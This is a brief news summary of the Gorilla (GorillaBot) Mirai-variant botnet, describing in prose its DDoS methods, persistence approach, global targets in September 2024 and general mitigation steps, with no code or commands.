A newly discovered botnet malware family, known as Gorilla (or GorillaBot), has been wreaking havoc on global cybersecurity. This variant of the leaked Mirai botnet source code has launched over 300,000 DDoS attacks across 100 countries, with China, the U.S., Canada, and Germany being the most targeted.
Gorilla Botnet: Capabilities and Tactics
The Gorilla Botnet employs various tactics to conduct devastating DDoS attacks. Its primary methods include UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. The botnet’s connectionless nature allows for arbitrary source IP spoofing, generating large amounts of traffic.
Technical Sophistication
Gorilla Botnet supports multiple CPU architectures, including ARM, MIPS, x86_64, and x86. It connects with one of five predefined command-and-control (C2) servers to await DDoS commands. Notably, the botnet exploits a security flaw in Apache Hadoop YARN RPC for remote code execution, a vulnerability that has been abused in the wild since 2021.
Persistence and Evasion
To maintain persistence, Gorilla Botnet creates a service file named “custom.service” in the “/etc/systemd/system/” directory, configuring it to run automatically at system startup. Similar commands are added to “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files to download and run a shell script (“lol.sh”) from a remote server.
Global Impact
Between September 4 and September 27, 2024, Gorilla Botnet issued an average of 20,000 commands daily, targeting universities, government websites, telecoms, banks, gaming, and gambling sectors. This alarming rate highlights the urgent need for cybersecurity professionals to stay vigilant.
Mitigation Strategies
To combat Gorilla Botnet, organizations must prioritize:
1. Real-time threat intelligence
2. Advanced DDoS protection
3. Regular security updates and patches
4. Network segmentation and isolation
5. Continuous monitoring and incident response
The emergence of Gorilla Botnet underscores the evolving nature of cybersecurity threats. Staying informed and proactive is crucial in protecting against these sophisticated attacks.
Read more at: https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.html?m=1
